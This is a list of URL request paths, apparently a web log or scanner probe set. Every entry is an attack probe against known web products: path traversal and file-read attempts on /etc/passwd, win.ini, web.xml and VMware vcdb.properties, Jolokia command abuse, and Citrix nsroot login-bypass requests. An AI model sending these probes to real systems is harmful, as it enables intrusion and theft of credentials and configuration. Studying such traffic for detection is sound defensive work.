/web/?a=display&templateFile=README.md
/web/druid/indexer/v1/sampler?for=connect
/web/maint/index.php?packages
/web/s/24s7kF5SsnY8FYwgq6BqibLdf70/_/;/WEB-INF/web.xml
/web/jars/upload
/web/s/24s7kF5SsnY8FYwgq6BqibLdf70/_/;/WEB-INF/web.xml
/web/jars/upload
/web/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk
/web/s/24s7kGAzCS0KwXpfrdTakkS6Nbm/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml
/web/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk
/web/s/24s7kGAzCS0KwXpfrdTakkS6Nbm/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml
/web/oliver/FileServlet?source=serverFile&fileName=c:/windows/win.ini
/web/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd
/web/WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml
/web/s/24s7kGAzCS0KwXpfrdTakkS6Nbm/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
/web/oliver/FileServlet?source=serverFile&fileName=c:/windows/win.ini
/web/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd
/web/WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml
/web/s/24s7kGAzCS0KwXpfrdTakkS6Nbm/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
/web/
/web/assets/file:%2f%2f/etc/passwd
/web/etc/passwd
/web/actuator/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd
/web/report/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml
/web/public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q=
/web/
/web/NCFindWeb?service=IPreAlertConfigService&filename=
/web/s/24s7kEkARrESzYtdmvAjiL1Cqk2/_/%2e/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml
/web/report/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml
/web/casmain.xgi
/web/.//WEB-INF/classes/META-INF/microprofile-config.properties
/web/NCFindWeb?service=IPreAlertConfigService&filename=
/web/s/24s7kEkARrESzYtdmvAjiL1Cqk2/_/%2e/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml
/web/eam/vib?id=C:\ProgramData\VMware\VMware+VirtualCenter\vcdb.properties
/web/s/24s7kEkARrESzYtdmvAjiL1Cqk2/_/%2e/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
/web/pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1
/web/cgi-bin/webproc
/web/menu/ss?sid=nsroot&username=nsroot&force_setup=1
/web/eam/vib?id=C:\ProgramData\VMware\VMware+VirtualCenter\vcdb.properties
/web/s/24s7kEkARrESzYtdmvAjiL1Cqk2/_/%2e/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
/web/lib///....//....//....//....//....//....//....//....//etc//passwd
/web/cgi-bin/webproc
/web/rest/tinymce/1/macro/preview
/web/eam/vib?id=C:\Documents+and+Settings\All+Users\Application+Data\VMware\VMware+VirtualCenter\vcdb.properties
/web/language/lang
/web/menu/ss?sid=nsroot&username=nsroot&force_setup=1
/web/etc/passwd
/web/rest/tinymce/1/macro/preview
/web/menu/neo
/web/eam/vib?id=C:\Documents+and+Settings\All+Users\Application+Data\VMware\VMware+VirtualCenter\vcdb.properties
/web/language/lang
/web/NCFindWeb?service=IPreAlertConfigService&filename=WEB-INF/web.xml
/web/wp-content/plugins/wp-payeezy-pay/donate.php
/web/eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties
/web/uir//etc/passwd
/web/menu/neo
/web/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd
/web/NCFindWeb?service=IPreAlertConfigService&filename=WEB-INF/web.xml
/web/(download)/etc/passwd
/web/viewlog.jsp
/web/wp-content/plugins/wp-payeezy-pay/donate.php
/web/menu/stc
/web/eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties
/web/include/thumb.php?dir=http/.....///.....///config/config_db.php
/web/(download)/etc/passwd
/web/viewlog.jsp
/web/weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/web.xml
/web/menu/stc
/web/include/thumb.php?dir=http/.....///.....///config/config_db.php
/web/public/index.php/home/file/user_pics
/web/weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/web.xml
/web/pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1
/web/include/thumb.php?dir=.....///http/.....///config/config_db.php
/web/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd
